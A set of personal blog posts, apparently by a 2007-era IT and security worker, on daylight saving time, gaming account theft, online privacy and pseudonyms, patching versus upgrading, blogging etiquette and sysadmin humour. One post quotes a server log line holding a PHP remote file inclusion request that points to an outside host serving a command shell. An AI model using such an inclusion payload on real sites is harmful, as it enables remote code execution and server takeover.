You know when this new DST change has gone too far when your building management sends out a memo reminding you to upgrade your systems and patch your applications.

I came across an interesting paper this evening. Found at the bottom on this site http://www.energy.ca.gov/daylightsaving.html

Dr. Adrienne Kandal, with the California Energy Commission's Demand Analysis Office, has written a paper titled Electricity Savings From Early Daylight Saving Time, Commission publication # CEC-200-2007-001. She concluded that, "There is no clear evidence that electricity will be saved from the earlier start to daylight saving time on March 11, 2007..."

Check out the entire report.

Kevin Finisterre on the FD mailing list has provided us with two good posts regarding apparent Xbox live accounts being stolen. So far, I haven't found any compelling evidence either way that this has or hasn't happened. Likewise nobody seems to have posted a proof of concept or really taken credit. Seems that we are in limbo. Lets hope that MS isn't covering this up. If so, we can probably all expect the "we are _really_ sorry" speech.

While we are on this topic, I'd like to remind you all about one of my 2007 predictions where I call for the need of stronger identity mechanisms for online gaming. Not only are we paying money for these online games, but they also make many people money. The service these company's like Microsoft, Sony and Linden provide are a market and need to be treated as such.

College, Computer Science major. The tool of choice - an expensive HP calculator. The first thing I did was engrave my name and drivers license number on the back. Certainly, that would thwart off the threat of theft. Fast forward a few months to summer break where I was returning to contract work with TK (of course we didn't call him TK back then). On day one of my return to the software company, I trudged into work with that calculator safely tucked away in my backpack. My plan? To show it off to TK. He'd be so enthralled, so interested to see such a cool gadget. With corners of mouth pointing to the sky,

"Hey dude, check out this calculator I've been using at college."
TK: "Wow, this thing is nuts". After a few minutes of key pressing, he flips it over. "Um, hey dude, nice disclosure of privacy there."
"What are you talking about?" I inquire.
TK points out my flaw, "You've posted your name and drivers license number for all the world to see. Not to mention, I kind of doubt that this will thwart off a theft or even help you recover it if it were stolen."

I guess he was right. What a dork. Not only did I knowingly disclose my own information, but also I managed to deface my cool calculator in the process. So much for trying to resell it later.

Back in October, I posted an intentionally humorous question about how each of you protects your own privacy. Truth be told, these are part of my own list of personal privacy security measures. (No I don't wear tin foil undergarments). I learned an important lesson in those days working for TK. One might say he unintentionally molded my into a "security nut". I became a new person, or rather changed into just a phantom. You would have been hard pressed to find me at all.

I enjoy reading Jaron Lanier. He is one of those scientists and authors who make sense by stating the obvious. Or rather it may not have been obvious to you until you read it. In his ongoing line of writings regarding groupthink and the Internet, he comments on anonymity and how it affects collective communities like Wikipedia, YouTube and MySpace. "Beware the online collective" is his recent publication from December 2006. I read the piece and quietly said my typical response, "Well Duh". This short essay managed to get stuck in my head since December. It was not until now that I know why.

Like many people, I have profiles on many of the popular community sites. On all but one of these accounts I use a pseudonym. I'm probably not unlike many other people who either don't trust the company running the site, or simply would like to participate, but in private. A lurker of sorts. I haven't changed my identity, nor am I anonymous. I'm just sitting there like a span port.

Amy Bruckman is another one of my valued researchers and authors. A long time ago, I used to help run a MOO. She became famous to me at that time as she was using the online community of MOOs to understand human psyche in the online world. One of her findings, poorly paraphrased, is that persons with online identities eventually become themselves again online. As hard as we try to build a different persona, or even change gender online, we eventually return to our true selves.

Well, as it turns out, Jaron and Amy are correct. I'm one of those anonymous persons participating in the mass groupthink revolution. And yes, you'll discover I have a different identity. Not even my best friends know my MySpace profile name. Times have changed, however.

Today is a different day. You might say I exist again. There is my picture on our blog and it's not so difficult to find me in Google. Being a real person again online is refreshing. I learned that you if you want to enact change, you can't do so from behind the curtain. More importantly, if you buy an expensive calculator, don't engrave your drivers license number on it.

I still own that calculator.

I asked around, "what's a patch compared to an upgrade?"

The upgrade is generally considered more invasive, larger and comes at a higher risk. It may or may not have a big reward. The reason for the upgrade may be external, internal, and feature-centric or security related. Operationally, an upgrade requires greater amount of testing, planning and more complete change control planning procedures.

Patching is viewed as a smaller change. Only one or a few very specific variables are altered. The risk is generally considered low, but with a high reward, as the problem at hand will be quickly fixed. Patches are generally installed with less testing and often are implemented during a normal change window.

Don't both a patch and an upgrade represent the same operational risk?

The perception is seemingly clear. Call something a patch and it will get rolled out quicker than an upgrade. Case in point here at nCircle. Our internal Information Technology Patch Tuesday SLA is 8 hours. The IT team has agreed to test and ready for deployment "patches" within 8 hours of their release. In general, the acceptance and installation of said patches throughout the organization is less than 24 hours later. The net is that within 24 hours of patch Tuesday, we have nearly 100% of all end points patched. Now compare Patch Tuesday with the end of life for FreeBSD 4.11. FreeBSD 4.11 was our IT sanctioned Unix server common operating environment. Version 4.11 went end of life on January 31st 2007. Even with more than 6 months of notices and hands-on help, we still have business units who haven't been able to fully migrate.

Sure the "upgrade" from 4.11 to 6.x is much more complicated and complex than a "patch", but there is more at hand. There is a hesitancy and procrastination. For most, the upgrade of FreeBSD is perceived at painful and with little reward. Meanwhile, installing a few Microsoft patches is easy and comes with a big security reward.

Change == Risk

One would think that any change at all represents risk. Patch or upgrade, both introduce change. It's not our job to be risk adverse, but to be risk managers. Are we doing our users a disservice by calling anything a patch? What if we called it "Change Tuesday", I guess that's better than "Time to introduce risk to your computer in hopes of being able to better manage risk at some unknown point in the future so I don't loose my job".

Put your trust in us

That is a direct quote from a website hosting malicious PHP payloads. This is a real story of irony. I laughed; I cried. Here we go.

Enter a publicly facing Unix system.
For whatever reason, it has SSH bound to a ton of ports, including 80 and 443.
The sysadmin reviews the logs daily.
What have we got today?
Look it's more PHP botnet traffic hitting port 80.
Silly bot, that's SSH bound to port 80.

Lets take a look at a log snippet

Apr 4 00:00:00 serverName sshd[93113]: Bad protocol version identification 'GET /PNC/modules/vWar_Account/includes/functions_common.php?vwar_root2= http://www.foo.com/safe' from x.x.x.x

Nothing to see here, move along, move along.
Just for fun, the sysadmin points his browser to www.foo.com/safe.
Nothing new here either, its standard PHP system() call.
Even for more fun, lets see what else is hosted at www.foo.com
It's a brochure website for a locksmith.
Their marketing tag line:

ALLOW US TO TAKE AWAY YOUR SECURITY PROBLEMS.

PUT YOUR TRUST IN US.

YOU WON'T BE DISAPPOINTED.

Maybe they specialize in bump keys?

(Picture is a screen shot snippet from the website. Real identities masked to protect the poor locksmith who probably has no idea what I'm talking about)

Tim O'Reilly, we don't need more rules. People just need to be educated.

In light of recent death threats to Kathy Sierra and the unfortunate outcome of her situation, Tim O'Reilly and others have put forth a draft of the Bloggers Code of Conduct. I once met Tim and he's a nice guy. Like any good geek I'm enamored with O'Reilly books, but more rules aren't the fix.

This might sound strange coming from a career IT guy. To live in IT, you need rules and procedures. What's more, you need people to follow them. The way we get people to follow rules is not by imposing more, it's by education. The code of conduct isn't exactly rules, but more akin to how I agree to act and how I expect others to act on the Internet. Well guess what? It already exists. Its called RFC 1855.

I've already called attention to RFC 1855 on this blog. It is something that everyone should read. Granted, it needs some updating for terminology and technology. However, the basis for which it rests and the ideologies for which it support are still valid.

Scoble responded to O'Reilly's post. In his response he noted something important that many people don't understand.

Second, I engage with my trolls. Why? Cause if they show up here I think they deserve an answer and I find they often get me to think deeper about the topic that I'm writing about than if we didn't engage in a little gutter wrestling.

I absolutely agree. Those who disagree with you should be invited to the conversation. None of us are all knowing. The act of disagreeing furthers the topic. Sometimes having to explain your position to a naysayer will force you to review your own opinion. At worst, you'll be back to the same conclusion. At best, you'll have a new understanding of which you can put in your toolbox for another day.

Lets turn our attention to something more productive - education. Spend a few minutes each week educating your user base. Instead of slapping someone for using an easy password, educate him or her on why the policy exists. Don't create more rules when rules are being broken. Get to the root of the problem. Spend time with your users. Let them complain and allow yourself to listen. Before conduct gets out of hand, pull out RFC1855. Let it be a course in history and manner.

Friday July 27th is Sysadmin Day.

Actual things I've heard said to a sysadmin....(yes, for real):

So my printer hums when it's printing. You need to get me a new one.
You need to get over this whole password thing.
Since you don't do anything important around here, how about faxing this for me?
Awesome Star Trek actions figures...I bought this new computer for my wife, I need you to ...
Don't worry, I wrote my password on a piece of paper and put it under my keyboard.
My old school mate sent me an e-greeting and now my computer is doing weird stuff.
I don't know what happened, all my files are gone and I have a presentation in 5 minutes.
Nothing, not a thing; I didn't install anything or make any changes.